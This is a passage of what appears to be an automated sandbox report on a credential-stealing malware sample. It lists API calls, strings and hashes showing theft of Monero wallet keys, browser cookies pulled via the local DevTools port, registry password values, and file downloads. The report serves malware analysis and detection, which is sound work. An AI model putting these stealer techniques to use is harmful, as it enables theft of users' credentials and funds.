                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                      • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                      • API String ID: 3174675846-3542011879
                                      • Opcode ID: d8a31f06d9ab14f99355cd097b29ab61460293fd914cb205d042508f81a9761d
                                      • Instruction ID: 430d839ee0ed02954945e212d992ce0c567b72784a74f3dd741b2321a1908d35
                                      • Opcode Fuzzy Hash: d8a31f06d9ab14f99355cd097b29ab61460293fd914cb205d042508f81a9761d
                                      • Instruction Fuzzy Hash: 8A514FB1D10608ABDB14EBE0DD96FEE7338BB54301F404558F60AAB191EF74AA49CF61
                                      APIs
                                        • Part of subcall function 00A4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00A4AAF6
                                        • Part of subcall function 00A362D0: InternetOpenA.WININET(00A50DFF,00000001,00000000,00000000,00000000), ref: 00A36331
                                        • Part of subcall function 00A362D0: StrCmpCA.SHLWAPI(?,0131F410), ref: 00A36353
                                        • Part of subcall function 00A362D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A36385
                                        • Part of subcall function 00A362D0: HttpOpenRequestA.WININET(00000000,GET,?,0131EE20,00000000,00000000,00400100,00000000), ref: 00A363D5
                                        • Part of subcall function 00A362D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00A3640F
                                        • Part of subcall function 00A362D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A36421
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A45568
                                      • lstrlen.KERNEL32(00000000), ref: 00A4557F
                                        • Part of subcall function 00A48FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A48FE2
                                      • StrStrA.SHLWAPI(00000000,00000000), ref: 00A455B4
                                      • lstrlen.KERNEL32(00000000), ref: 00A455D3
                                      • lstrlen.KERNEL32(00000000), ref: 00A455FE
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                      • API String ID: 3240024479-1526165396
                                      • Opcode ID: a634d4f2f498535ea073fecc5bc3502fd563767ef24059c58af720ff3785e3c0
                                      • Instruction ID: 4e437de9935913e63b20b8066f1b4084b60f7ea9573d5490d5863fd45a852fe1
                                      • Opcode Fuzzy Hash: a634d4f2f498535ea073fecc5bc3502fd563767ef24059c58af720ff3785e3c0
                                      • Instruction Fuzzy Hash: 66510C78950508ABDB14FF60CEA6BED7739EFA0381F504468F40A5B592EB306F05CB62
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen
                                      • String ID:
                                      • API String ID: 2001356338-0
                                      • Opcode ID: dbaebf2f41b49505819ae01b5291514af1b6ed56e03d03b0ae2da8fdbcb562db
                                      • Instruction ID: a3c562034a03b6005287d18536185aacf4177c1408d2619d8cc35261137386cc
                                      • Opcode Fuzzy Hash: dbaebf2f41b49505819ae01b5291514af1b6ed56e03d03b0ae2da8fdbcb562db
                                      • Instruction Fuzzy Hash: B6C1A6B9D402199BCB14EF60DD99FDE7379BFA4304F004598F50997242EA70EA85CFA1
                                      APIs
                                        • Part of subcall function 00A48F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A48F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A4453C
                                      • lstrcat.KERNEL32(?,0131EB98), ref: 00A4455B
                                      • lstrcat.KERNEL32(?,?), ref: 00A4456F
                                      • lstrcat.KERNEL32(?,0131D380), ref: 00A44583
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A48F20: GetFileAttributesA.KERNEL32(00000000,?,00A31B94,?,?,00A5577C,?,?,00A50E22), ref: 00A48F2F
                                        • Part of subcall function 00A3A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00A3A489
                                        • Part of subcall function 00A3A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A3A13C
                                        • Part of subcall function 00A3A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A3A161
                                        • Part of subcall function 00A3A110: LocalAlloc.KERNEL32(00000040,?), ref: 00A3A181
                                        • Part of subcall function 00A3A110: ReadFile.KERNEL32(000000FF,?,00000000,00A3148F,00000000), ref: 00A3A1AA
                                        • Part of subcall function 00A3A110: LocalFree.KERNEL32(00A3148F), ref: 00A3A1E0
                                        • Part of subcall function 00A3A110: CloseHandle.KERNEL32(000000FF), ref: 00A3A1EA
                                        • Part of subcall function 00A49550: GlobalAlloc.KERNEL32(00000000,00A4462D,00A4462D), ref: 00A49563
                                      • StrStrA.SHLWAPI(?,0131ED78), ref: 00A44643
                                      • GlobalFree.KERNEL32(?), ref: 00A44762
                                        • Part of subcall function 00A3A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A34F3E,00000000,00000000), ref: 00A3A23F
                                        • Part of subcall function 00A3A210: LocalAlloc.KERNEL32(00000040,?,?,?,00A34F3E,00000000,?), ref: 00A3A251
                                        • Part of subcall function 00A3A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A34F3E,00000000,00000000), ref: 00A3A27A
                                        • Part of subcall function 00A3A210: LocalFree.KERNEL32(?,?,?,?,00A34F3E,00000000,?), ref: 00A3A28F
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A446F3
                                      • StrCmpCA.SHLWAPI(?,00A508D2), ref: 00A44710
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00A44722
                                      • lstrcat.KERNEL32(00000000,?), ref: 00A44735
                                      • lstrcat.KERNEL32(00000000,00A50FA0), ref: 00A44744
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                      • String ID:
                                      • API String ID: 3541710228-0
                                      • Opcode ID: 25299dbb71a58aae688ab80d2aa4dd6eae846f6ba668fd9091d73027252f52fd
                                      • Instruction ID: 049e401151644782200ef12abd65c8b290a4570edf42a6c92920c20a427860ee
                                      • Opcode Fuzzy Hash: 25299dbb71a58aae688ab80d2aa4dd6eae846f6ba668fd9091d73027252f52fd
                                      • Instruction Fuzzy Hash: BA7156B6D00218ABDB14EBB0DD5AFDE7379AB98300F004598F60997181EB35EB59CF61
                                      APIs
                                        • Part of subcall function 00A312A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A312B4
                                        • Part of subcall function 00A312A0: RtlAllocateHeap.NTDLL(00000000), ref: 00A312BB
                                        • Part of subcall function 00A312A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00A312D7
                                        • Part of subcall function 00A312A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00A312F5
                                        • Part of subcall function 00A312A0: RegCloseKey.ADVAPI32(?), ref: 00A312FF
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A3134F
                                      • lstrlen.KERNEL32(?), ref: 00A3135C
                                      • lstrcat.KERNEL32(?,.keys), ref: 00A31377
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                        • Part of subcall function 00A48CF0: GetSystemTime.KERNEL32(00A50E1B,0131E198,00A505B6,?,?,00A313F9,?,0000001A,00A50E1B,00000000,?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A48D16
                                        • Part of subcall function 00A4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00A4AC82
                                        • Part of subcall function 00A4AC30: lstrcat.KERNEL32(00000000), ref: 00A4AC92
                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00A31465
                                        • Part of subcall function 00A4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00A4AAF6
                                        • Part of subcall function 00A3A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A3A13C
                                        • Part of subcall function 00A3A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A3A161
                                        • Part of subcall function 00A3A110: LocalAlloc.KERNEL32(00000040,?), ref: 00A3A181
                                        • Part of subcall function 00A3A110: ReadFile.KERNEL32(000000FF,?,00000000,00A3148F,00000000), ref: 00A3A1AA
                                        • Part of subcall function 00A3A110: LocalFree.KERNEL32(00A3148F), ref: 00A3A1E0
                                        • Part of subcall function 00A3A110: CloseHandle.KERNEL32(000000FF), ref: 00A3A1EA
                                      • DeleteFileA.KERNEL32(00000000), ref: 00A314EF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                      • API String ID: 3478931302-218353709
                                      • Opcode ID: 00914606dceb808cc995bcae8a35a8f8c68e9da9efc403cd217081877d449bac
                                      • Instruction ID: 217a0808841db58250965006c486fcb2ce4939c8547cee9995e0f36d2b283d45
                                      • Opcode Fuzzy Hash: 00914606dceb808cc995bcae8a35a8f8c68e9da9efc403cd217081877d449bac
                                      • Instruction Fuzzy Hash: 085156B5D502185BDB55FB60DE92FED733CAFA4300F4045D8B60A62092EE306F89CB65
                                      APIs
                                      • InternetOpenA.WININET(00A50AF6,00000001,00000000,00000000,00000000), ref: 00A39A6A
                                      • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00A39AAB
                                      • InternetCloseHandle.WININET(00000000), ref: 00A39AC7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$Open$CloseHandle
                                      • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                      • API String ID: 3289985339-2144369209
                                      • Opcode ID: e8ea6735c5cea35c8f43f822bc6d33667e39e534cb23cf6564a043db4e1402a0
                                      • Instruction ID: ca0b0b42b3be1a526c78d0e715582730a159a704c5dc29fe0951df3c2e6672fb
                                      • Opcode Fuzzy Hash: e8ea6735c5cea35c8f43f822bc6d33667e39e534cb23cf6564a043db4e1402a0
                                      • Instruction Fuzzy Hash: 2B412D35A10258EBCB14EFA4CD95FDE7778BB48740F104154F609AB190CBB4AE84CF60
                                      APIs
                                        • Part of subcall function 00A37330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00A3739A
                                        • Part of subcall function 00A37330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00A37411
                                        • Part of subcall function 00A37330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00A3746D
                                        • Part of subcall function 00A37330: GetProcessHeap.KERNEL32(00000000,?), ref: 00A374B2
                                        • Part of subcall function 00A37330: HeapFree.KERNEL32(00000000), ref: 00A374B9
                                      • lstrcat.KERNEL32(00000000,00A5192C), ref: 00A37666
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00A376A8
                                      • lstrcat.KERNEL32(00000000, : ), ref: 00A376BA
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00A376EF
                                      • lstrcat.KERNEL32(00000000,00A51934), ref: 00A37700
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00A37733
                                      • lstrcat.KERNEL32(00000000,00A51938), ref: 00A3774D
                                      • task.LIBCPMTD ref: 00A3775B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                      • String ID: :
                                      • API String ID: 2677904052-3653984579
                                      • Opcode ID: 31e180dbfa9ba9bedc985afa531444b2463b80e7ba08bc3349f311fac37320aa
                                      • Instruction ID: cdae752a31ad464d74aaae82c9c07f60cbe316eee697710ee60aea18c1fcba1d
                                      • Opcode Fuzzy Hash: 31e180dbfa9ba9bedc985afa531444b2463b80e7ba08bc3349f311fac37320aa
                                      • Instruction Fuzzy Hash: 8E3122B5D04209EBDB04DBB4DDA6EFF7779BB44301F104618F506AB3A1DA34A945CB60
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0131E970,00000000,?,00A50E14,00000000,?,00000000), ref: 00A482C0
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A482C7
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00A482E8
                                      • __aulldiv.LIBCMT ref: 00A48302
                                      • __aulldiv.LIBCMT ref: 00A48310
                                      • wsprintfA.USER32 ref: 00A4833C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                      • String ID: %d MB$@
                                      • API String ID: 2774356765-3474575989
                                      • Opcode ID: d2746068a1a917ad574ad4c71703fe7632e75ea5bd9d0aafff979dea2b10b02b
                                      • Instruction ID: b1acaf25de8bac790be2cfc83c53b97ca1a8677eb37898d54c96c6c7819c6a71
                                      • Opcode Fuzzy Hash: d2746068a1a917ad574ad4c71703fe7632e75ea5bd9d0aafff979dea2b10b02b
                                      • Instruction Fuzzy Hash: 38213DB1E44308ABDB00DFD4DD4AFAEB7B8FB44B10F104509F619BB280C77869018BA5
                                      APIs
                                        • Part of subcall function 00A4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00A4AAF6
                                        • Part of subcall function 00A34800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A34889
                                        • Part of subcall function 00A34800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00A34899
                                      • InternetOpenA.WININET(00A50DFB,00000001,00000000,00000000,00000000), ref: 00A3615F
                                      • StrCmpCA.SHLWAPI(?,0131F410), ref: 00A36197
                                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00A361DF
                                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00A36203
                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 00A3622C
                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00A3625A
                                      • CloseHandle.KERNEL32(?,?,00000400), ref: 00A36299
                                      • InternetCloseHandle.WININET(?), ref: 00A362A3
                                      • InternetCloseHandle.WININET(00000000), ref: 00A362B0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
